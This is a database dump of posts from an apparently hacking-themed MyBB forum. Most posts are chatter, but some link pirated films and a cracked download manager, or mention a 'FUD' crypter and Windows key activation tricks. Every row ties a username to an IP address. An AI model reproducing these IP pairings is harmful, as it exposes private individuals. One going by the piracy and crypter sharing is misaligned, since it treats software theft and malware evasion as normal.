`uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4340', '826', '4325', '7', 'RE: L33T Hacking Tinychat Room', '0', '222', 'Exposé', '1350080355', 'Can\'t people easily see this link lol?', '66.87.84.153', '1113019545', '1', '0', '0', '0', '1', '796234691b146dc97705fb905e8d48e2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4341', '702', '3593', '35', 'RE: You guys like my new userbar?', '0', '222', 'Exposé', '1350080456', 'Thanks dude. Took me like 2 min', '66.87.84.153', '1113019545', '1', '0', '0', '0', '1', '9ea9eb84f37a5c3a560f51039c721da2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4342', '824', '4310', '4', 'RE: Glowing Here!', '0', '222', 'Exposé', '1350080748', 'Sup glowing thanks or joining the site :)', '66.87.84.153', '1113019545', '1', '0', '0', '0', '1', '8ddb2de7d98961d02bc48c6eeb3a6c84', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4343', '824', '4310', '4', 'RE: Glowing Here!', '0', '3', '??????????¢™', '1350080789', 'Welcome to LH, Hope you have a great time here.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'c320629bcd6e8a0ac2a9b70ec393504a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4344', '804', '4209', '42', 'RE: Ninja caught in US Airport', '0', '222', 'Exposé', '1350080817', 'Haha I would have paid to see this with my own eyes', '66.87.84.153', '1113019545', '1', '0', '0', '0', '1', '7178c24ecce4a3109cc264e1961e819e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4345', '822', '4302', '47', 'RE: Huge Ultimate Graphics Pack Worth $2.400 | GIVEAWAY | Become A Pro GFX Designer |', '0', '222', 'Exposé', '1350080873', 'I\'ll join this giveaway sure :). Looks nice', '66.87.84.153', '1113019545', '1', '0', '0', '0', '1', 'a53101f83c3a9f55a562c05e0dc74e51', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4346', '565', '2806', '20', 'RE: [FREE] CHROME CRYPTER | FUD [FREE]', '0', '249', 'Ultimatum', '1350091295', '^ Seems legit LOL. You said you got it off HF. Now it\'s another site?', '121.223.26.30', '2044664350', '1', '0', '0', '0', '1', '12d9380e7f609a0cb1b289145989b000', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4347', '826', '4325', '7', 'RE: L33T Hacking Tinychat Room', '0', '1', 't3h jok3r', '1350092176', 'L33THacking does not and will not have any official chatroom(s) and moved to the right section because such announcements belong in this section.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2c95f1c8c249999a51eb83d3d9977561', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4348', '803', '4186', '4', 'RE: bye LH fun knowing u', '0', '82', 'iTzIpod', '1350092697', 'Good bye NeonLights. We lost 1 HQ & Active Member.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1725209523408a58237788bb55bb827d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4349', '729', '3657', '7', 'RE: Skype Virus [MUST READ!]', '0', '82', 'iTzIpod', '1350092749', 'Kinda LQ post ^ Just saying. But oh well. Post is a post. Boosts forum activity.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e8ff826d2994f20423a8371f7623e01f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4350', '790', '4126', '58', 'RE: Unique - Recruitment', '0', '82', 'iTzIpod', '1350092788', 'I\'ll apply. Do I still gotta fill out the form? Even though I was the Original Leader of Unique?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '5088a4b80504f4671e44c195db3ab3ab', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4351', '171', '528', '8', 'RE: What Genre do you listen to?', '0', '82', 'iTzIpod', '1350092844', 'I like your taste in Music! ;) Rap + Dubstep :3 Also, it\'s not Dupstep. It\'s Dubstep. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7784b6244fea2e63b15d3913939dd987', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4352', '825', '4320', '8', 'RE: Favorite Rappers?', '0', '82', 'iTzIpod', '1350092876', 'Wiz Khalifa & Drake, don\'t remember anyone else :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ecb528075ad7400da9c7e561af909e05', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4353', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1350092905', 'Banned for being Sirchamp .', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a4b1931137fdcfe099bcbded7e1106d5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4354', '418', '1925', '16', 'RE: [eBook][Special] iTzIpod\'s SEing Tutorial', '0', '82', 'iTzIpod', '1350092944', 'I know. I\'m sorry about not making it fancy :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c4e8c8f1c5655c6e4cbb3766157d36e8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4355', '827', '4326', '76', 'RE: Playstation names', '0', '82', 'iTzIpod', '1350092976', 'Seems OG :p Lool I\'ll add you tomorrow or so. If I can remember.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '552059f17ab772857c9d06592f858207', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4356', '565', '2806', '20', 'RE: [FREE] CHROME CRYPTER | FUD [FREE]', '0', '100', '??zg???g????61', '1350093008', 'Uh sorry not sure I understand what your trying to say..', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'b478edd3cc003cf4b321c81829923606', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4357', '826', '4325', '7', 'RE: L33T Hacking Tinychat Room', '0', '82', 'iTzIpod', '1350093061', 'Not looking forward to this..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '52c7c249cf7cd8b624a1d8a476747e61', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4358', '826', '4347', '7', 'RE: L33T Hacking Tinychat Room', '0', '100', '??zg???g????61', '1350093076', '[quote=\'t3h jok3r\' pid=\'4347\' dateline=\'1350092176\'] L33THacking does not and will not have any official chatroom(s) and moved to the right section because such announcements belong in this section. [/quote] I know, just a place for anyone that wants to to talk. :)', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'c1e9ccd9138378948d7a41aac333d212', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4359', '803', '4186', '4', 'RE: bye LH fun knowing u', '0', '2', 'Apathy', '1350093099', 'Bye it is too bad to see a active member go.', '173.206.177.91', '-1378963109', '0', '0', '0', '0', '1', '091c937f6c526a86106b81aedad49e3d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4360', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '82', 'iTzIpod', '1350093158', 'Lool. I play this game. Well, I\'m kinda inactive now. I was never a member. I wish I was though :p I have NO AC tokens. Umm I\'m level 40 or 35 or 30 or 45. (That\'s very specific) :p I don\'t remember I didn\'t log in for a long time. I heard you gotta be Member or so just to make a guild which kinda sucks. I think my name was iTzIpod. Not sure. Try looking at my character page.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '513fb38ceef9687fe156285ef045a630', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4361', '697', '3554', '74', 'RE: Who plays Minecraft out here?', '0', '82', 'iTzIpod', '1350093240', 'Can we play tomorrow @GRON ? Also, You guys should make a Server Called LHCraft or L33tCraft. I don\'t know.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f6ca174cfc73e01778c8ac895a7833fb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4362', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '2', 'Apathy', '1350093853', 'I am a guardian I have not played in years though. Level like 66 or something.', '173.206.177.91', '-1378963109', '0', '0', '0', '0', '1', '09c2f53bc8541a48e9a5f2c809dd2124', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4363', '822', '4345', '47', 'RE: Huge Ultimate Graphics Pack Worth $2.400 | GIVEAWAY | Become A Pro GFX Designer |', '0', '228', 'VirtualLegend', '1350094309', '[quote=\'ƒ???????????g\' pid=\'4345\' dateline=\'1350080873\'] I\'ll join this giveaway sure :). Looks nice [/quote] Welcome to the GIVEAWAY :D', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '89aa1965dbcbb8041407fbcabe224295', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4364', '822', '4302', '47', 'RE: Huge Ultimate Graphics Pack Worth $2.400 | GIVEAWAY | Become A Pro GFX Designer |', '0', '2', 'Apathy', '1350094458', 'I would love this hope I get it. :P', '173.206.177.91', '-1378963109', '0', '0', '0', '0', '1', '13c34ed341531fad93d3661800c981c4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4365', '827', '4326', '76', 'RE: Playstation names', '0', '1', 't3h jok3r', '1350098316', 'This guy is real and I invited him to L33Thacking. Thanks for joining.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2b54c73f2c1add0fbe13cdfa303ad707', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4366', '190', '4322', '56', 'RE: Copy and paste game', '0', '4', 'Triple H', '1350098681', '[quote=\'Anonymous™\' pid=\'4322\' dateline=\'1350043602\'] http://www.youtube.com/watch?v=9_YT2igOAHM&feature=b-cat-comedy [/quote] You got an english version? http://forumtopsites.net/index.php?a=in&u=joker', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9dd29e57c575c0647d6af40d41bdf4c8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4367', '804', '4209', '42', 'RE: Ninja caught in US Airport', '0', '4', 'Triple H', '1350098834', 'How did he even departure with all those?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '065002a215134c0734a0056c78475ad1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4368', '729', '3657', '7', 'RE: Skype Virus [MUST READ!]', '0', '4', 'Triple H', '1350098887', 'One of my PC already got infected through this.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f4da55eaaa5d5792f59f6c0716f1031c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4369', '824', '4310', '4', 'RE: Glowing Here!', '0', '4', 'Triple H', '1350098943', 'Welcome to L33THacking, your username reminds me of someone from LH.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'eddcec31ff401ed3a8db675484e6612b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4370', '832', '0', '25', '[News] Windows 8 security flaw', '0', '4', 'Triple H', '1350099105', 'Windows 8 is the first operating system from Microsoft to support alternative non-biometric authentication mechanisms such as Picture Password and PIN. A vulnerability discovered by a password security vendor - \"Passcape\" in Microsoft’s Windows 8 operating system that it saves a log on password in plain text and allows any user with admin rights to see the password details. In September, though, some drawbacks of the new authentication method were reported by Passcape Software. The picture password had seemed invulnerable, because whoever tries to guess it must know how and what parts of the image to choose, and in addition, the gesture sequence. However, security experts from Passcape discovered that such a unique password is based on a regular account. A user should first create a regular password-based account and then optionally switch to the picture password or PIN authentication. Notably, the original plain-text password to the account is still stored in the system encrypted with the AES algorithm, in a Vault storage at [i]%SYSTEM_DIR%/config/systemprofile/AppData/Local/Microsoft/Vault/4BF4C442-9B8A-41A0-B380-DD4A704DDB28. - See more at: http://thehackernews.com/2012/10/windows-8-security-flaw-logon-passwords.html#sthash.0mxjthJZ.dpuf[/i] [img]http://1.bp.blogspot.com/-ir906HesG_I/UHhgSTnW-AI/AAAAAAAAJi8/Vqs573MwLBs/s640/Windows+8+Security+flaw.png[/img] Source: http://thehackernews.com/2012/10/windows-8-security-flaw-logon-passwords.html#sthash.0mxjthJZ.dpbs', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6150c2753d1338e5581d748c89c6629e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4371', '790', '4350', '58', 'RE: Unique - Recruitment', '0', '4', 'Triple H', '1350099252', '[quote=\'iTzIpod\' pid=\'4350\' dateline=\'1350092788\'] I\'ll apply. Do I still gotta fill out the form? Even though I was the Original Leader of Unique? [/quote] Aren\'t your 1K posts enough to prove how unique you are?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '4670ed174c924bd0fbc1c198c4c7c43b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4372', '790', '4126', '58', 'RE: Unique - Recruitment', '0', '232', 'BreShiE', '1350099691', 'Damn, guess I\'ll have to come back once I get 50 posts.', '78.149.81.254', '1318408702', '1', '0', '0', '0', '1', '0f8fc3280b799b59e2bd3e00662131aa', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4373', '824', '4310', '4', 'RE: Glowing Here!', '0', '232', 'BreShiE', '1350099723', 'Welcome to the forums Glowing, hope you enjoy your stay. ~BreShiE', '78.149.81.254', '1318408702', '1', '0', '0', '0', '1', '645606b8547edd843087d4075231f084', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4374', '832', '4370', '25', 'RE: [News] Windows 8 security flaw', '0', '232', 'BreShiE', '1350099783', 'I hope they fix this before it is released. I\'m thinking about purchasing it. I\'ll get a discount because I\'m a student. :D', '78.149.81.254', '1318408702', '1', '0', '0', '0', '1', '93b95380dd730aedb48cc2dc91afe7d8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4375', '833', '0', '3', 'New feature coming up!', '0', '1', 't3h jok3r', '1350099871', 'After a lot of requests I\'m finally adding this to LH even though I have been suggested not to. If the sites activity drops due to this feature then it would be removed permanently. Thanks to BreShie for sending me this. [spoiler] I\'m adding a chat feature on L33THacking :D You can video chat, send files, share screen, audio chat, send emoticons, save conversation and much more. [/spoiler]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '4958c6211cda727ea27403b50629f98d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4376', '833', '4375', '3', 'RE: New feature coming up!', '0', '232', 'BreShiE', '1350100145', 'No worries man, I\'m here to help. :) I want to help this forum grow into the great forum that I know it can, and will be!', '78.149.81.254', '1318408702', '1', '0', '0', '0', '1', 'd8dcc19265a0628173d4d68e30be3f00', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4377', '834', '0', '64', 'The Marine DVDrip', '0', '5', 'Timmy', '1350100210', '[img]http://upload.wikimedia.org/wikipedia/en/thumb/8/8f/The_marine.jpg/220px-The_marine.jpg[/img] Genre: Action , Drama , Thriller Release: 2006 October Length: 1H., 33 min. Views: 0 (7 votes) Rate: 91% [b]Description[/b] A group of diamond thieves on the run kidnap the wife of a recently discharged marine who goes on a chase through the South Carolinian wilderness to retrieve her.. [b]Links [/b] [url=http://www.embedder.eu/frame.php?url=http://www.putlocker.com/file/1H4XWG18NFI8WW4O]Putlocker[/url] [url=http://www.embedder.eu/frame.php?url=http://www.sockshare.com/file/G0UUVCJTLRSWKO4]Sockshare[/url]', '72.231.24.165', '1223104677', '1', '0', '5', '1350100271', '1', '3af981a6ab1c14f434791021a793146e', '0', '1350100271'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4378', '833', '4375', '3', 'RE: New feature coming up!', '0', '3', '??????????¢™', '1350100270', 'Nice, I cant wait to see it.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'aa54d1a5ec9e96a10a91c11a12fe6944', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4379', '834', '4377', '64', 'RE: The Marine DVDrip', '0', '205', 'mothered', '1350101015', 'I like movies of this nature. Does this get right Into the storyline/action, or does It drag on?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '0d40844400db516b206cc0805fd48d55', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4380', '822', '4302', '47', 'RE: Huge Ultimate Graphics Pack Worth $2.400 | GIVEAWAY | Become A Pro GFX Designer |', '0', '100', '??zg???g????61', '1350101092', 'Can I join? :) thanks this is awesome', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '8b2cc078f1e66e13ed7785d78e653e71', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4381', '835', '0', '24', 'Just purchased another Lappy', '0', '205', 'mothered', '1350101212', 'Greetings to all, So one of my test lappies, Is really giving me hassles, whereby the spacebar, and half the keys aren\'t functional. The optical drive Isn\'t working and the screen tends to flicker every now and then. I decided enough Is enough, and just purchased a new lappy for testing purposes. All up, I now have 7 fully-functional lappies. Here\'s what I bought: http://www.mln.com.au/product/?itemID=3955 I haven\'t checked, but I believe the RRP Is a load of crap. I know what I reckon, so good or bad, what do you guys think?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '56be6033a18cce56dae9b764b90ce4e0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4382', '833', '4375', '3', 'RE: New feature coming up!', '0', '205', 'mothered', '1350101324', 'It works for some, and not for others. I personally believe It\'ll be a good addition.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '978a460ace7046e6fdd6629441012a24', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4383', '764', '3895', '15', 'RE: Hack Pack By Timmy | 2GB |', '0', '205', 'mothered', '1350101438', 'The link Is working fine on my end. Downloading right now. Many thanks mate.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '7078491abc59ad387d0e7c6d35ec7cb4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4384', '523', '2615', '43', 'RE: Windows 8 Pro Keys', '0', '205', 'mothered', '1350101557', 'Unfortunately, Microsoft have cracked down on the offline activation method. That said, I haven\'t tried all countries though.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '91c423e8af391c14d650cdf81584c226', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4385', '836', '0', '30', 'Internet Download Manager [IDM] v6.12.22 + crack + skin', '0', '255', 'sbhshroy2', '1350101731', '[color=darkred]Internet Download Manager [IDM] v6.12 . 22 +crack[/color] [color=green]Internet Download Manager [IDM] v6.12 Build 22 Final - Full with skin ? Incl. crack by muftakis Released: october 10, 2012 [/color] [img]http://upit.cc/i/84c88dd4.jpg[/img] [img]http://upit.cc/i/bd199cc1.png[/img] [quote]nternet Download Manager (IDM) has a smart download logic accelerator that features intelligent dynamic file segmentation and safe multipart downloading technology to accelerate your downloads. IDM increases download speeds by up to 5 times, resumes and schedules downloads. Comprehensive error recovery and resume capability will restart broken or interrupted downloads due to lost connections, network problems, computer shutdowns, or unexpected power outages. Simple graphic user interface makes IDM user friendly and easy to use. IDM has a smart download logic accelerator that features intelligent dynamic file segmentation and safe multipart downloading technology to accelerate your downloads. Unlike other download managers and accelerators, IDM segments downloaded files dynamically during download process and reuses available connections without additional connect and login stages to achieve best acceleration performance. Main Features: ? Internet Download Manager supports all popular browsers including IE, AOL, MSN, Opera, Firefox, Avant Browser, and it can be integrated into any Internet application to take over downloads using unique ?Advanced Browser Integration? feature. ? Dynamic Segmentation and Performance. ? Easy downloading with one click. When you click on a download link in a browser, IDM will take over the download and accelerate it. IDM supports HTTP, FTP, HTTPS and MMS protocols. ? Download Speed Acceleration. IDM can accelerate downloads by up to 5 times due to its intelligent dynamic file segmentation technology. ? Download Resume. IDM will resume unfinished download from the place where they left off. ? 